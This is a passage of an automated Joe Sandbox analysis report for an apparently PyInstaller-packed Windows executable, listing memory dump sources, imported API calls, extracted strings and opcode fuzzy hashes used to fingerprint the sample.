                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction ID: a82c8a6454abc9f9a96854bade8cba12e1fb63ec7c658794435a6b7df54cae6c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C118721B1DA4586F360AB62F854329B3A0FB48FE4F90427CEA5D877A4DF7CD8048750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF79A319216), ref: 00007FF79A318592
                                                                                                                                                                                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3185E9
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A319400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF79A3145E4,00000000,00007FF79A311985), ref: 00007FF79A319439
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A318678
                                                                                                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186E4
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A3186F5
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF79A319216), ref: 00007FF79A31870A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3462794448-0
                                                                                                                                                                                                                              • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction ID: dba5e01fc88a54f0df9eb652ebd4e3ee7c3ac9c6ab4bfd903598468ac0cea3c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B418162B1A68241FA70EB32A5446AAB394FB84BC4F85027DDF8D57B89DE3CD501C724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B347
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B37D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3AA
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3BB
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3CC
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF79A324F81,?,?,?,?,00007FF79A32A4FA,?,?,?,?,00007FF79A3271FF), ref: 00007FF79A32B3E7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                              • Instruction ID: 38e3362a4eacfb75e83ecbf16b4a28812e42bfc1184b3967348f694af00986e0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE113B20B0E64282FA74BB319A5517DF2829F447A0FD487BCEE2E467D6DE2CB4018321
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction ID: f501e8dbccc9f18aa5ac0fcba33b4eebf876968e719e9e4b1fa66b54cfee513b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6531B522B1A68152F730EB75A8416E6B295BF887D8F80013DFE8D83755EF7CD5468610
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction ID: ea6164a33f99ea05d5061345a38fa5467f57571141975a36f91b6de440f74145
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28314A72A1AA8289FB20EF71E8552F9B360FF89788F84017DEA4D47A49DF3CD1458710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF79A31918F,?,00007FF79A313C55), ref: 00007FF79A312BA0
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF79A312C2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction ID: 2f389f5a7695937ff2bc29169c8e6a2f334d5f5fcfb6527f915c45107f6b20f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021D122B09B4192F720EB65F8847EAB3A4FB88784F80013EEE8D57659DE3CD645C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF79A311B99), ref: 00007FF79A312760
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction ID: fddc892f905377e5c9ac2dbfed2311a6bed1831833bf9a42d32a1ffeb0a4a2a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB218E72A1AB8182F670EB61B8817E6B3A4FB88384F80017DFE8C47659DF7CD6458750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction ID: 2e20c439f850b9cc883e699072db82c390d648411c02f8f99ca6c56cfe179dbd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF04F21E0A60682FA60AB34A899379B360AF45761FD406BDDA6E461E4DF2CD444C320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction ID: a43e02ceae4b777d456a7e579573dbd10ea9977e3b6ba35cc75c43da69c8ccd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2118262E5DA13A1FA74B134D477376B0446F59364EC40ABCEAAE062D6CE2C69414264
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B41F
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B43E
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B466
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B477
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF79A32A613,?,?,00000000,00007FF79A32A8AE,?,?,?,?,?,00007FF79A32A83A), ref: 00007FF79A32B488
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                              • Instruction ID: 1d2b2f241a8a0fadcbeede62a05a77b5e099780154514e6828fdbbb9954bb4c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e370891a427e995cf622d6c66c6ae617f18e5219a23357883517039299fedc16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44113020F0F64281FA78B73599961B9F2815F447B0FD887BCDD3D466D6DE2CB8418220
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                              • Instruction ID: de96ef790fffefeebc44034530ff6d9624b7c9bfa265193ce7353a4a1a40ef70
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e449caa10890978289f0fc2f631dee428fb70040431ae2bf3103bb36de88fb08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58111820E1B20742F978BA7158156BAF2818F45324FD887BCED3E4A2D2DD2CB8014231
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction ID: 8d0d28bd5b0e1e05dda1f02d465027fe5ca449077f58f0131e85165420268c35
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9291AB22A0AB4681F771AE35E45037DB6A1EF40B94F84817EDE4A423C6DF3CF8058361
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                              • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction ID: 233d0ad5b0d599eb083509346c113782ae44eb483ce3b5d5adadfb5687adf87f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9981D032E0E24386F7757F39C110278B7A0AB11B48FD580BDDE099729ADB2DE921D761
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                              • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                              • Instruction ID: a2f8247e661a3252d4eba9d4ae56190789f1f1c995bc78842721e4931de32f4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
